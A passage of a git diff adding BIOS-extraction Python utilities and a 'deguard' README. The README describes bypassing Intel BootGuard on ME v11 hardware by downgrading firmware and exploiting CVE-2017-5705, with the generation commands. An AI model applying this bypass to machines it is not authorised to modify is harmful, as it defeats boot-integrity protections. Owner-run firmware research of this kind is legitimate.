^ xor_data).to_bytes(cab_size, 'big') # Perform XOR 0xFF and get actual CAB data + + printer('Extracting archive...', padding + 4) + + cab_path = os.path.join(extract_path, f'{name}_Temporary.cab') + + with open(cab_path, 'wb') as cab_file: + cab_file.write(cab_data) # Create temporary CAB archive + + if is_szip_supported(cab_path, padding + 8, check=True): + if szip_decompress(cab_path, extract_path, 'CAB', padding + 8, check=True) == 0: + os.remove(cab_path) # Successful extraction, delete temporary CAB archive + else: + return 3 + else: + return 2 + + return 0 + +# Unlock VAIO Packaging Manager executable +def vaio_unlock(name, buffer, extract_path, padding=0): + match_cfg = PAT_VAIO_CFG.search(buffer) + + if not match_cfg: + return 1 + + printer('Attempting to Unlock executable!', padding) + + # Initialize VAIO Package Configuration file variables (assume overkill size of 0x500) + cfg_bgn,cfg_end,cfg_false,cfg_true = [match_cfg.start(), match_cfg.start() + 0x500, b'', b''] + + # Get VAIO Package Configuration file info, split at new_line and stop at payload DOS header (EOF) + cfg_info = buffer[cfg_bgn:cfg_end].split(b'\x0D\x0A\x4D\x5A')[0].replace(b'\x0D',b'').split(b'\x0A') + + printer('Retrieving True/False values...', padding + 4) + + # Determine VAIO Package Configuration file True & False values + for info in cfg_info: + if info.startswith(b'ExtractPathByUser='): + cfg_false = bytearray(b'0' if info[18:] in (b'0',b'1') else info[18:]) # Should be 0/No/False + if info.startswith(b'UseCompression='): + cfg_true = bytearray(b'1' if info[15:] in (b'0',b'1') else info[15:]) # Should be 1/Yes/True + + # Check if valid True/False values have been retrieved + if cfg_false == cfg_true or not cfg_false or not cfg_true: + printer('Error: Could not retrieve True/False values!', padding + 8) + return 2 + + printer('Adjusting UseVAIOCheck entry...', padding + 4) + + # Find and replace UseVAIOCheck entry from 1/Yes/True to 0/No/False + vaio_check = PAT_VAIO_CHK.search(buffer[cfg_bgn:]) + if vaio_check: + buffer[cfg_bgn + vaio_check.end():cfg_bgn + vaio_check.end() + len(cfg_true)] = cfg_false + else: + printer('Error: Could not 
find entry UseVAIOCheck!', padding + 8) + return 3 + + printer('Adjusting ExtractPathByUser entry...', padding + 4) + + # Find and replace ExtractPathByUser entry from 0/No/False to 1/Yes/True + user_path = PAT_VAIO_EXT.search(buffer[cfg_bgn:]) + if user_path: + buffer[cfg_bgn + user_path.end():cfg_bgn + user_path.end() + len(cfg_false)] = cfg_true + else: + printer('Error: Could not find entry ExtractPathByUser!', padding + 8) + return 4 + + printer('Storing unlocked executable...', padding + 4) + + # Store Unlocked VAIO Packaging Manager executable + if vaio_check and user_path: + unlock_path = os.path.join(extract_path, f'{name}_Unlocked.exe') + with open(unlock_path, 'wb') as unl_file: + unl_file.write(buffer) + + return 0 + +# Parse & Extract or Unlock VAIO Packaging Manager +def vaio_pkg_extract(input_file, extract_path, padding=0): + input_buffer = file_to_bytes(input_file) + + input_name = os.path.basename(input_file) + + make_dirs(extract_path, delete=True) + + if vaio_cabinet(input_name, input_buffer, extract_path, padding) == 0: + printer('Successfully Extracted!', padding) + elif vaio_unlock(input_name, bytearray(input_buffer), extract_path, padding) == 0: + printer('Successfully Unlocked!', padding) + else: + printer('Error: Failed to Extract or Unlock executable!', padding) + return 1 + + return 0 + +if __name__ == '__main__': + BIOSUtility(TITLE, is_vaio_pkg, vaio_pkg_extract).run_utility() diff --git a/blobs/t480/biosutilities/common/checksums.py b/blobs/t480/biosutilities/common/checksums.py new file mode 100644 index 00000000..3e958ab1 --- /dev/null +++ b/blobs/t480/biosutilities/common/checksums.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +# Get Checksum 16-bit +def get_chk_16(data, value=0, order='little'): + for idx in range(0, len(data), 2): + # noinspection PyTypeChecker + value += int.from_bytes(data[idx:idx + 2], order) + + value &= 0xFFFF + + return value + +# Get Checksum 8-bit XOR +def get_chk_8_xor(data, value=0): + for byte in data: + value ^= byte + + value ^= 0x0 + + return value diff --git a/blobs/t480/biosutilities/common/comp_efi.py b/blobs/t480/biosutilities/common/comp_efi.py new file mode 100644 index 00000000..2837898b --- /dev/null +++ b/blobs/t480/biosutilities/common/comp_efi.py @@ -0,0 +1,57 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import os +import subprocess + +from common.path_ops import project_root, safe_path +from common.system import get_os_ver, printer + +def get_compress_sizes(data): + size_compress = int.from_bytes(data[0x0:0x4], 'little') + size_original = int.from_bytes(data[0x4:0x8], 'little') + + return size_compress, size_original + +def is_efi_compressed(data, strict=True): + size_comp,size_orig = get_compress_sizes(data) + + check_diff = size_comp < size_orig + + if strict: + check_size = size_comp + 0x8 == len(data) + else: + check_size = size_comp + 0x8 <= len(data) + + return check_diff and check_size + +# Get TianoCompress path +def get_tiano_path(): + exec_name = f'TianoCompress{".exe" if get_os_ver()[1] else ""}' + + return safe_path(project_root(), ['external',exec_name]) + +# EFI/Tiano Decompression via TianoCompress +def efi_decompress(in_path, out_path, padding=0, silent=False, comp_type='--uefi'): + try: + subprocess.run([get_tiano_path(), '-d', in_path, '-o', out_path, '-q', comp_type], check=True, stdout=subprocess.DEVNULL) + + with open(in_path, 'rb') as file: + _,size_orig = 
get_compress_sizes(file.read()) + + if os.path.getsize(out_path) != size_orig: + raise Exception('EFI_DECOMPRESS_ERROR') + except Exception: + if not silent: + printer(f'Error: TianoCompress could not extract file {in_path}!', padding) + + return 1 + + if not silent: + printer('Succesfull EFI decompression via TianoCompress!', padding) + + return 0 diff --git a/blobs/t480/biosutilities/common/comp_szip.py b/blobs/t480/biosutilities/common/comp_szip.py new file mode 100644 index 00000000..fb6041b8 --- /dev/null +++ b/blobs/t480/biosutilities/common/comp_szip.py @@ -0,0 +1,72 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import os +import subprocess + +from common.path_ops import project_root, safe_path +from common.system import get_os_ver, printer + +# Get 7-Zip path +def get_szip_path(): + exec_name = '7z.exe' if get_os_ver()[1] else '7zzs' + + return safe_path(project_root(), ['external',exec_name]) + +# Check 7-Zip bad exit codes (0 OK, 1 Warning) +def check_bad_exit_code(exit_code): + if exit_code not in (0,1): + raise Exception(f'BAD_EXIT_CODE_{exit_code}') + +# Check if file is 7-Zip supported +def is_szip_supported(in_path, padding=0, args=None, check=False, silent=False): + try: + if args is None: + args = [] + + szip_c = [get_szip_path(), 't', in_path, *args, '-bso0', '-bse0', '-bsp0'] + + szip_t = subprocess.run(szip_c, check=False) + + if check: + check_bad_exit_code(szip_t.returncode) + except Exception: + if not silent: + printer(f'Error: 7-Zip could not check support for file {in_path}!', padding) + + return False + + return True + +# Archive decompression via 7-Zip +def szip_decompress(in_path, out_path, in_name, padding=0, args=None, check=False, silent=False): + if not in_name: + in_name = 'archive' + + try: + if args is None: + args = [] + + szip_c = [get_szip_path(), 'x', *args, '-aou', '-bso0', '-bse0', '-bsp0', f'-o{out_path}', in_path] + + szip_x = subprocess.run(szip_c, check=False) + + if check: + check_bad_exit_code(szip_x.returncode) + + if not os.path.isdir(out_path): + raise Exception('EXTRACT_DIR_MISSING') + except Exception: + if not silent: + printer(f'Error: 7-Zip could not extract {in_name} file {in_path}!', padding) + + return 1 + + if not silent: + printer(f'Succesfull {in_name} decompression via 7-Zip!', padding) + + return 0 diff --git a/blobs/t480/biosutilities/common/externals.py b/blobs/t480/biosutilities/common/externals.py new file mode 100644 index 00000000..f81e3b91 --- /dev/null +++ b/blobs/t480/biosutilities/common/externals.py @@ -0,0 +1,38 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +from common.path_ops import project_root, safe_path +from common.system import get_os_ver + +# https://github.com/allowitsme/big-tool by Dmitry Frolov +# https://github.com/platomav/BGScriptTool by Plato Mavropoulos +def get_bgs_tool(): + try: + # noinspection PyUnresolvedReferences + from external.big_script_tool import BigScript # pylint: disable=E0401,E0611 + except Exception: + BigScript = None + + return BigScript + +# Get UEFIFind path +def get_uefifind_path(): + exec_name = f'UEFIFind{".exe" if get_os_ver()[1] else ""}' + + return safe_path(project_root(), ['external', exec_name]) + +# Get UEFIExtract path +def get_uefiextract_path(): + exec_name = f'UEFIExtract{".exe" if get_os_ver()[1] else ""}' + + return safe_path(project_root(), ['external', exec_name]) + +# Get ToshibaComExtractor path +def get_comextract_path(): + exec_name = f'comextract{".exe" if 
get_os_ver()[1] else ""}' + + return safe_path(project_root(), ['external', exec_name]) diff --git a/blobs/t480/biosutilities/common/num_ops.py b/blobs/t480/biosutilities/common/num_ops.py new file mode 100644 index 00000000..c37e4d74 --- /dev/null +++ b/blobs/t480/biosutilities/common/num_ops.py @@ -0,0 +1,14 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +# https://leancrew.com/all-this/2020/06/ordinals-in-python/ by Dr. Drang +def get_ordinal(number): + s = ('th', 'st', 'nd', 'rd') + ('th',) * 10 + + v = number % 100 + + return f'{number}{s[v % 10]}' if v > 13 else f'{number}{s[v]}' diff --git a/blobs/t480/biosutilities/common/path_ops.py b/blobs/t480/biosutilities/common/path_ops.py new file mode 100644 index 00000000..bcff167b --- /dev/null +++ b/blobs/t480/biosutilities/common/path_ops.py @@ -0,0 +1,154 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import os +import re +import sys +import stat +import shutil +from pathlib import Path, PurePath + +from common.text_ops import is_encased, to_string + +# Fix illegal/reserved Windows characters +def safe_name(in_name): + name_repr = repr(in_name).strip("'") + + return re.sub(r'[\\/:"*?<>|]+', '_', name_repr) + +# Check and attempt to fix illegal/unsafe OS path traversals +def safe_path(base_path, user_paths): + # Convert base path to absolute path + base_path = real_path(base_path) + + # Merge user path(s) to string with OS separators + user_path = to_string(user_paths, os.sep) + + # Create target path from base + requested user path + target_path = norm_path(base_path, user_path) + + # Check if target path is OS illegal/unsafe + if is_safe_path(base_path, target_path): + return target_path + + # Re-create target path from base + leveled/safe illegal "path" (now file) + nuked_path = norm_path(base_path, safe_name(user_path)) + + # Check if illegal path leveling worked + if is_safe_path(base_path, nuked_path): + return nuked_path + + # Still illegal, raise exception to halt execution + raise Exception(f'ILLEGAL_PATH_TRAVERSAL: {user_path}') + +# Check for illegal/unsafe OS path traversal +def is_safe_path(base_path, target_path): + base_path = real_path(base_path) + + target_path = real_path(target_path) + + common_path = os.path.commonpath((base_path, target_path)) + + return base_path == common_path + +# Create normalized base path + OS separator + user path +def norm_path(base_path, user_path): + return os.path.normpath(base_path + os.sep + user_path) + +# Get absolute path, resolving any symlinks +def real_path(in_path): + return os.path.realpath(in_path) + +# Get Windows/Posix OS agnostic path +def agnostic_path(in_path): + return PurePath(in_path.replace('\\', os.sep)) + +# Get absolute parent of path +def path_parent(in_path): + return Path(in_path).parent.absolute() + +# Get final path component, with suffix +def path_name(in_path): + return PurePath(in_path).name + +# Get final path component, w/o suffix +def path_stem(in_path): + return PurePath(in_path).stem + +# Get list of path file extensions +def path_suffixes(in_path): + return PurePath(in_path).suffixes or [''] + +# Check if path is absolute +def is_path_absolute(in_path): + return Path(in_path).is_absolute() + +# Create folder(s), controlling parents, existence and prior deletion +def make_dirs(in_path, parents=True, exist_ok=False, delete=False): + if delete: + del_dirs(in_path) + + Path.mkdir(Path(in_path), parents=parents, exist_ok=exist_ok) + +# Delete folder(s), if present 
+def del_dirs(in_path): + if Path(in_path).is_dir(): + shutil.rmtree(in_path, onerror=clear_readonly) + +# Copy file to path with or w/o metadata +def copy_file(in_path, out_path, meta=False): + if meta: + shutil.copy2(in_path, out_path) + else: + shutil.copy(in_path, out_path) + +# Clear read-only file attribute (on shutil.rmtree error) +def clear_readonly(in_func, in_path, _): + os.chmod(in_path, stat.S_IWRITE) + in_func(in_path) + +# Walk path to get all files +def get_path_files(in_path): + path_files = [] + + for root, _, files in os.walk(in_path): + for name in files: + path_files.append(os.path.join(root, name)) + + return path_files + +# Get path without leading/trailing quotes +def get_dequoted_path(in_path): + out_path = to_string(in_path).strip() + + if len(out_path) >= 2 and is_encased(out_path, ("'",'"')): + out_path = out_path[1:-1] + + return out_path + +# Set utility extraction stem +def extract_suffix(): + return '_extracted' + +# Get utility extraction path +def get_extract_path(in_path, suffix=extract_suffix()): + return f'{in_path}{suffix}' + +# Get project's root directory +def project_root(): + root = Path(__file__).parent.parent + + return real_path(root) + +# Get runtime's root directory +def runtime_root(): + if getattr(sys, 'frozen', False): + root = Path(sys.executable).parent + else: + root = project_root() + + return real_path(root) diff --git a/blobs/t480/biosutilities/common/patterns.py b/blobs/t480/biosutilities/common/patterns.py new file mode 100644 index 00000000..ecdde393 --- /dev/null +++ b/blobs/t480/biosutilities/common/patterns.py @@ -0,0 +1,34 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import re + +PAT_AMI_PFAT = re.compile(br'_AMIPFAT.AMI_BIOS_GUARD_FLASH_CONFIGURATIONS', re.DOTALL) +PAT_AMI_UCP = re.compile(br'@(UAF|HPU).{12}@', re.DOTALL) +PAT_APPLE_EFI = re.compile(br'\$IBIOSI\$.{16}\x2E\x00.{6}\x2E\x00.{8}\x2E\x00.{6}\x2E\x00.{20}\x00{2}', re.DOTALL) +PAT_APPLE_IM4P = re.compile(br'\x16\x04IM4P\x16\x04mefi') +PAT_APPLE_PBZX = re.compile(br'pbzx') +PAT_APPLE_PKG = re.compile(br'xar!') +PAT_AWARD_LZH = re.compile(br'-lh[04567]-') +PAT_DELL_FTR = re.compile(br'\xEE\xAA\xEE\x8F\x49\x1B\xE8\xAE\x14\x37\x90') +PAT_DELL_HDR = re.compile(br'\xEE\xAA\x76\x1B\xEC\xBB\x20\xF1\xE6\x51.\x78\x9C', re.DOTALL) +PAT_DELL_PKG = re.compile(br'\x72\x13\x55\x00.{45}7zXZ', re.DOTALL) +PAT_FUJITSU_SFX = re.compile(br'FjSfxBinay\xB2\xAC\xBC\xB9\xFF{4}.{4}\xFF{4}.{4}\xFF{4}\xFC\xFE', re.DOTALL) +PAT_INSYDE_IFL = re.compile(br'\$_IFLASH') +PAT_INSYDE_SFX = re.compile(br'\x0D\x0A;!@InstallEnd@!\x0D\x0A(7z\xBC\xAF\x27|\x6E\xF4\x79\x5F\x4E)') +PAT_INTEL_ENG = re.compile(br'\x04\x00{3}[\xA1\xE1]\x00{3}.{8}\x86\x80.{9}\x00\$((MN2)|(MAN))', re.DOTALL) +PAT_INTEL_IFD = re.compile(br'\x5A\xA5\xF0\x0F.{172}\xFF{16}', re.DOTALL) +PAT_MICROSOFT_CAB = re.compile(br'MSCF\x00{4}') +PAT_MICROSOFT_MZ = re.compile(br'MZ') +PAT_MICROSOFT_PE = re.compile(br'PE\x00{2}') +PAT_PHOENIX_TDK = re.compile(br'\$PACK\x00{3}..\x00{2}.\x00{3}', re.DOTALL) +PAT_PORTWELL_EFI = re.compile(br'') +PAT_TOSHIBA_COM = re.compile(br'\x00{2}[\x00-\x02]BIOS.{20}[\x00\x01]', re.DOTALL) +PAT_VAIO_CAB = re.compile(br'\xB2\xAC\xBC\xB9\xFF{4}.{4}\xFF{4}.{4}\xFF{4}\xFC\xFE', re.DOTALL) +PAT_VAIO_CFG = re.compile(br'\[Setting]\x0D\x0A') +PAT_VAIO_CHK = re.compile(br'\x0AUseVAIOCheck=') +PAT_VAIO_EXT = re.compile(br'\x0AExtractPathByUser=') diff --git a/blobs/t480/biosutilities/common/pe_ops.py b/blobs/t480/biosutilities/common/pe_ops.py new file mode 100644 index 
00000000..ba23828d --- /dev/null +++ b/blobs/t480/biosutilities/common/pe_ops.py @@ -0,0 +1,49 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import pefile + +from common.system import printer +from common.text_ops import file_to_bytes + +# Check if input is a PE file +def is_pe_file(in_file): + return bool(get_pe_file(in_file)) + +# Get pefile object from PE file +def get_pe_file(in_file, fast=True): + in_buffer = file_to_bytes(in_file) + + try: + # Analyze detected MZ > PE image buffer + pe_file = pefile.PE(data=in_buffer, fast_load=fast) + except Exception: + pe_file = None + + return pe_file + +# Get PE info from pefile object +def get_pe_info(pe_file): + try: + # When fast_load is used, IMAGE_DIRECTORY_ENTRY_RESOURCE must be parsed prior to FileInfo > StringTable + pe_file.parse_data_directories(directories=[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_RESOURCE']]) + + # Retrieve MZ > PE > FileInfo > StringTable information + pe_info = pe_file.FileInfo[0][0].StringTable[0].entries + except Exception: + pe_info = {} + + return pe_info + +# Print PE info from pefile StringTable +def show_pe_info(pe_info, padding=0): + if type(pe_info).__name__ == 'dict': + for title,value in pe_info.items(): + info_title = title.decode('utf-8','ignore').strip() + info_value = value.decode('utf-8','ignore').strip() + if info_title and info_value: + printer(f'{info_title}: {info_value}', padding, new_line=False) diff --git a/blobs/t480/biosutilities/common/struct_ops.py b/blobs/t480/biosutilities/common/struct_ops.py new file mode 100644 index 00000000..b995ba14 --- /dev/null +++ b/blobs/t480/biosutilities/common/struct_ops.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import ctypes + +char = ctypes.c_char +uint8_t = ctypes.c_ubyte +uint16_t = ctypes.c_ushort +uint32_t = ctypes.c_uint +uint64_t = ctypes.c_uint64 + +# https://github.com/skochinsky/me-tools/blob/master/me_unpack.py by Igor Skochinsky +def get_struct(buffer, start_offset, class_name, param_list=None): + if param_list is None: + param_list = [] + + structure = class_name(*param_list) # Unpack parameter list + struct_len = ctypes.sizeof(structure) + struct_data = buffer[start_offset:start_offset + struct_len] + fit_len = min(len(struct_data), struct_len) + + ctypes.memmove(ctypes.addressof(structure), struct_data, fit_len) + + return structure diff --git a/blobs/t480/biosutilities/common/system.py b/blobs/t480/biosutilities/common/system.py new file mode 100644 index 00000000..9598e302 --- /dev/null +++ b/blobs/t480/biosutilities/common/system.py @@ -0,0 +1,68 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import sys + +from common.text_ops import padder, to_string + +# Get Python Version (tuple) +def get_py_ver(): + return sys.version_info + +# Get OS Platform (string) +def get_os_ver(): + sys_os = sys.platform + + is_win = sys_os == 'win32' + is_lnx = sys_os.startswith('linux') or sys_os == 'darwin' or sys_os.find('bsd') != -1 + + return sys_os, is_win, is_win or is_lnx + +# Check for --auto-exit|-e +def is_auto_exit(): + return bool('--auto-exit' in sys.argv or '-e' in sys.argv) + +# Check Python Version +def check_sys_py(): + sys_py = get_py_ver() + + if sys_py < (3,10): + sys.stdout.write(f'\nError: Python >= 3.10 required, not {sys_py[0]}.{sys_py[1]}!') + + if not is_auto_exit(): + # noinspection PyUnresolvedReferences + (raw_input if sys_py[0] <= 2 else input)('\nPress enter 
to exit') # pylint: disable=E0602 + + sys.exit(125) + +# Check OS Platform +def check_sys_os(): + os_tag,os_win,os_sup = get_os_ver() + + if not os_sup: + printer(f'Error: Unsupported platform "{os_tag}"!') + + if not is_auto_exit(): + input('\nPress enter to exit') + + sys.exit(126) + + # Fix Windows Unicode console redirection + if os_win: + sys.stdout.reconfigure(encoding='utf-8') + +# Show message(s) while controlling padding, newline, pausing & separator +def printer(in_message='', padd_count=0, new_line=True, pause=False, sep_char=' '): + message = to_string(in_message, sep_char) + + padding = padder(padd_count) + + newline = '\n' if new_line else '' + + output = newline + padding + message + + (input if pause and not is_auto_exit() else print)(output) diff --git a/blobs/t480/biosutilities/common/templates.py b/blobs/t480/biosutilities/common/templates.py new file mode 100644 index 00000000..f69af33f --- /dev/null +++ b/blobs/t480/biosutilities/common/templates.py @@ -0,0 +1,162 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +import os +import sys +import ctypes +import argparse +import traceback + +from common.num_ops import get_ordinal +from common.path_ops import get_dequoted_path, get_extract_path, get_path_files, is_path_absolute, path_parent, runtime_root, safe_path +from common.system import check_sys_os, check_sys_py, get_os_ver, is_auto_exit, printer + +class BIOSUtility: + + MAX_FAT32_ITEMS = 65535 + + def __init__(self, title, check, main, padding=0): + self._title = title + self._main = main + self._check = check + self._padding = padding + self._arguments_kw = {} + + # Initialize argparse argument parser + self._argparser = argparse.ArgumentParser() + + self._argparser.add_argument('files', type=argparse.FileType('r', encoding='utf-8'), nargs='*') + self._argparser.add_argument('-e', '--auto-exit', help='skip all user action prompts', action='store_true') + self._argparser.add_argument('-v', '--version', help='show utility name and version', action='store_true') + self._argparser.add_argument('-o', '--output-dir', help='extract in given output directory') + self._argparser.add_argument('-i', '--input-dir', help='extract from given input directory') + + self._arguments,self._arguments_unk = self._argparser.parse_known_args() + + # Managed Python exception handler + sys.excepthook = self._exception_handler + + # Check Python Version + check_sys_py() + + # Check OS Platform + check_sys_os() + + # Show Script Title + printer(self._title, new_line=False) + + # Show Utility Version on demand + if self._arguments.version: + sys.exit(0) + + # Set console/terminal window title (Windows only) + if get_os_ver()[1]: + ctypes.windll.kernel32.SetConsoleTitleW(self._title) + + # Process input files and generate output path + self._process_input_files() + + # Count input files for exit code + self._exit_code = len(self._input_files) + + def parse_argument(self, *args, **kwargs): + _dest = self._argparser.add_argument(*args, **kwargs).dest + self._arguments = self._argparser.parse_known_args(self._arguments_unk)[0] + self._arguments_kw.update({_dest: self._arguments.__dict__[_dest]}) + + def run_utility(self): + for _input_file in self._input_files: + _input_name = os.path.basename(_input_file) + + printer(['***', _input_name], self._padding) + + if not self._check(_input_file): + printer('Error: This is not a supported input!', self._padding + 4) + + continue # Next input file + + _extract_path = os.path.join(self._output_path, 
get_extract_path(_input_name)) + + if os.path.isdir(_extract_path): + for _suffix in range(2, self.MAX_FAT32_ITEMS): + _renamed_path = f'{os.path.normpath(_extract_path)}_{get_ordinal(_suffix)}' + + if not os.path.isdir(_renamed_path): + _extract_path = _renamed_path + + break # Extract path is now unique + + if self._main(_input_file, _extract_path, self._padding + 4, **self._arguments_kw) in [0, None]: + self._exit_code -= 1 + + printer('Done!', pause=True) + + sys.exit(self._exit_code) + + # Process input files + def _process_input_files(self): + self._input_files = [] + + if len(sys.argv) >= 2: + # Drag & Drop or CLI + if self._arguments.input_dir: + _input_path_user = self._arguments.input_dir + _input_path_full = self._get_input_path(_input_path_user) if _input_path_user else '' + self._input_files = get_path_files(_input_path_full) + else: + # Parse list of input files (i.e. argparse FileType objects) + for _file_object in self._arguments.files: + # Store each argparse FileType object's name (i.e. path) + self._input_files.append(_file_object.name) + # Close each argparse FileType object (i.e. allow input file changes) + _file_object.close() + + # Set output fallback value for missing argparse Output and Input Path + _output_fallback = path_parent(self._input_files[0]) if self._input_files else None + + # Set output path via argparse Output path or argparse Input path or first input file path + _output_path = self._arguments.output_dir or self._arguments.input_dir or _output_fallback + else: + # Script w/o parameters + _input_path_user = get_dequoted_path(input('\nEnter input directory path: ')) + _input_path_full = self._get_input_path(_input_path_user) if _input_path_user else '' + self._input_files = get_path_files(_input_path_full) + + _output_path = get_dequoted_path(input('\nEnter output directory path: ')) + + self._output_path = self._get_input_path(_output_path) + + # Get absolute input file path + @staticmethod + def _get_input_path(input_path): + if not input_path: + # Use runtime directory if no user path is specified + absolute_path = runtime_root() + else: + # Check if user specified path is absolute + if is_path_absolute(input_path): + absolute_path = input_path + # Otherwise, make it runtime directory relative + else: + absolute_path = safe_path(runtime_root(), input_path) + + return absolute_path + + # https://stackoverflow.com/a/781074 by Torsten Marek + @staticmethod + def _exception_handler(exc_type, exc_value, exc_traceback): + if exc_type is KeyboardInterrupt: + printer('') + else: + printer('Error: Utility crashed, please report the following:\n') + + traceback.print_exception(exc_type, exc_value, exc_traceback) + + if not is_auto_exit(): + input('\nPress enter to exit') + + sys.exit(127) diff --git a/blobs/t480/biosutilities/common/text_ops.py b/blobs/t480/biosutilities/common/text_ops.py new file mode 100644 index 00000000..f0070512 --- /dev/null +++ b/blobs/t480/biosutilities/common/text_ops.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python3 +#coding=utf-8 + +""" +Copyright (C) 2022 Plato Mavropoulos +""" + +# Generate padding (spaces or tabs) +def padder(padd_count, tab=False): + return ('\t' if tab else ' ') * padd_count + +# Get String from given input object +def to_string(in_object, sep_char=''): + if type(in_object).__name__ in ('list','tuple'): + out_string = sep_char.join(map(str, in_object)) + else: + out_string = str(in_object) + + return out_string + +# Get Bytes from given buffer or file path +def file_to_bytes(in_object): + object_bytes = in_object + 
+ if type(in_object).__name__ not in ('bytes','bytearray'): + with open(to_string(in_object), 'rb') as object_data: + object_bytes = object_data.read() + + return object_bytes + +# Check if string starts and ends with given character(s) +def is_encased(in_string, chars): + return in_string.startswith(chars) and in_string.endswith(chars) diff --git a/blobs/t480/biosutilities/external/requirements.txt b/blobs/t480/biosutilities/external/requirements.txt new file mode 100644 index 00000000..798c16cf --- /dev/null +++ b/blobs/t480/biosutilities/external/requirements.txt @@ -0,0 +1,2 @@ +lznt1 >= 0.2 +pefile >= 2022.5.30 diff --git a/blobs/t480/deguard/.gitignore b/blobs/t480/deguard/.gitignore new file mode 100644 index 00000000..834b16bd --- /dev/null +++ b/blobs/t480/deguard/.gitignore @@ -0,0 +1,2 @@ +__pycache__ +test diff --git a/blobs/t480/deguard/README.md b/blobs/t480/deguard/README.md new file mode 100644 index 00000000..186001ce --- /dev/null +++ b/blobs/t480/deguard/README.md @@ -0,0 +1,81 @@ +# Bypass Intel BootGuard on ME v11.x.x.x hardware + +This utility allows generating BootGuard bypass images for hardware running ME v11.x.x.x firmware. + +This includes Skylake, Kaby Lake, and some Coffee Lake PCHs. Both the H (desktop) and LP (mobile) firmware +variants are supported. + +## Background + +This uses [CVE-2017-5705](https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00086.html). + +It has been fixed by Intel in newer ME v11.x.x.x firmware releases; however, ME11 hardware has no protection +against downgrading the ME version by overwriting the SPI flash physically, thus we can downgrade to a vulnerable +version. + +After downgrade, we exploit the bup module of the vulnerable firmware, overwriting the copy of field programmable fuses +stored in SRAM, resulting in the fused BootGuard configuration being replaced with our desired one. + +## Adding new target + +As a board porter, you need to provide the delta between the default and vendor-provided ME configuration. + +This goes in the `data/delta/` directory for each target. + +To obtain this, dump the vendor firmware from your board, and execute: + +`./generatedelta.py --input <vendor image> --output data/delta/<target name>` + +Note the delta generation only takes your factory dump as an input. This is because an ME image contains both the +default and system specific configuration, and these can be compared by deguard. + +You *must discard* the `/home/secureboot` directory from the delta for the zero FPF config to work. + +You can optionally also discard `home/{amt,fwupdate,pavp,ptt}` from the delta. + +## Generating images for an existing target + +As a user wishing to generate an image for a supported target: + +You will need to obtain a donor image for your platform variant with a supported ME version (see URLs below). + +This can either be a full image with a flash descriptor or just a bare ME region. + +Afterwards, execute the following command and enjoy: + +`./finalimage.py --delta data/delta/<target name> --version <donor ME version> --pch <PCH type> --sku <2M or 5M SKU> --fake-fpfs data/fpfs/zero --input <donor image> --output <output ME image>` + +The output will be a bare deguard-patched ME region. + +Please note: +- **The HAP bit must be enabled** in your flash descriptor for deguard-generated ME images to work. +- The DCI bit must be enabled in your flash descriptor for DCI debugging over USB. + + +## Note on field programmable fuses + +This document recommends faking a set of FPFs that are all zero as a BootGuard bypass strategy.
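+
+For example, here is a hypothetical invocation for the ThinkPad T480 delta shipped in this tree, using the 11.6.0.1126 LP/2M donor listed in the table below; the exact `--pch`/`--sku` strings (`LP`, `2M`) and the input/output file names are illustrative assumptions, not values taken from this repository:
+
+`./finalimage.py --delta data/delta/thinkpad_t480 --version 11.6.0.1126 --pch LP --sku 2M --fake-fpfs data/fpfs/zero --input donor_me.bin --output me_deguarded.bin`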
+ +Faking all-zero FPFs causes the platform to work in legacy mode, and it does not require dumping the fuses from the PCH. + +It is also possible to enable measured mode instead (there is some example FPF data for this). + +Theoretically it is possible to even re-enable BootGuard with a custom private key (with the caveat that it is +obviously insecure against physical access). + +## Donor images + +This section lists some URLs to recommended and tested donor images. Any image with a supported firmware +version and variant ought to work, but the path of least resistance is for everyone to use the same images. + +|Version|Variant|SKU|URL|Notes| +|-|-|-|-|-| +|11.6.0.1126|H (Desktop)|2M|[link](https://web.archive.org/web/20230822134231/https://download.asrock.com/BIOS/1151/H110M-DGS(7.30)ROM.zip)|Zipped flash image| +|11.6.0.1126|LP (Laptop)|2M|[link](https://web.archive.org/web/20241110222323/https://dl.dell.com/FOLDER04573471M/1/Inspiron_5468_1.3.0.exe)|Dell BIOS update (use Dell_PFS_Extract.py)| + +## Thanks + +Thanks go to PT Research and Youness El Alaoui for previous work on exploiting Intel SA 00086, which this PoC is heavily reliant on. + +- [IntelTXE-PoC](https://github.com/kakaroto/IntelTXE-PoC) +- [MFSUtil](https://github.com/kakaroto/MFSUtil) diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/emu_fuse_map b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/emu_fuse_map new file mode 100644 index 00000000..78259a9d Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/emu_fuse_map differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/fuse_ip_base b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/fuse_ip_base new file mode 100644 index 00000000..658a9660 Binary files /dev/null and b/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/fuse_ip_base differ diff --git a/blobs/t480/deguard/data/delta/optiplex_3050/home/bup/bup_sku/plat_n_sku 